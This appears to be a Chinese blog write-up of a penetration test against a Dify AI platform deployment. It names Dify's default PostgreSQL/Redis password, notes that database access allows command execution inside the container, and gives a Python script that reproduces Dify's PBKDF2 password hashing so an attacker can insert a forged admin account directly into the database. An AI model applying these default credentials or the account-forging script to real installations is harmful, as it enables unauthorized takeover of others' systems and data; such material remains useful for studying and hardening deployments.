关于一次dify的渗透

https://github.com/langgenius/dify

ai目前最近很火，刚好工作中碰到了，就记录一下吧。

数据库权限入口

dify的账号密码是初始化登录的时候设置的，暂时不考虑账号的弱口令。但是dify的启动过程中，会开启psql和redis。默认密码是difyai123456.截图如下。可以尝试连接。本次的重点就是从这里开始的。

丢一个默认的配置吧。没仔细研究但是看了应该是默认的。

psql权限可以执行系统命令不再老生长谈。但是只是一个docker的权限，还能利用的操作空间不大。

获取后台权限

拿到了数据库，我们的目前是dify web的数据或者权限。所以还是要回归web来。审计dify的代码发现，获取了数据库，可以通过数据库新增一个账号来进入后台。源代码如下,密码的规则如下

那么可以去生成一个账号。细节不分析了我这里直接贴代码

import secretsimport base64import hashlibimport binasciiimport uuid

# 生成16字节的盐值def generate_salt():    return secrets.token_bytes(16)

# 对密码进行哈希处理，返回加密后的密文def hash_password(password_str, salt_byte):    dk = hashlib.pbkdf2_hmac("sha256", password_str.encode("utf-8"), salt_byte, 10000)    return binascii.hexlify(dk)

# 对结果进行base64编码def encode_base64(data):    return base64.b64encode(data).decode()

# 密码加密和存储的主过程def encrypt_password(new_password):    # 生成盐值    salt = generate_salt()
    # 密码哈希加密    password_hashed = hash_password(new_password, salt)
    # 编码密码和盐值为base64格式    base64_password_hashed = encode_base64(password_hashed)    base64_salt = encode_base64(salt)
    return base64_password_hashed, base64_salt

# 模拟账户类class Account:    def __init__(self, password, salt):        self.password = password        self.password_salt = salt

# 测试用例，设置密码new_password = "Dasiwoba1"  # 这里替换为你的密码
# 获取加密后的密码和盐值encrypted_password, encrypted_salt = encrypt_password(new_password)
# 创建账户对象，并存储加密信息account = Account(encrypted_password, encrypted_salt)
# 输出加密结果print(uuid.uuid4())print("Encrypted Password (Base64):", account.password)print("Salt (Base64):", account.password_salt)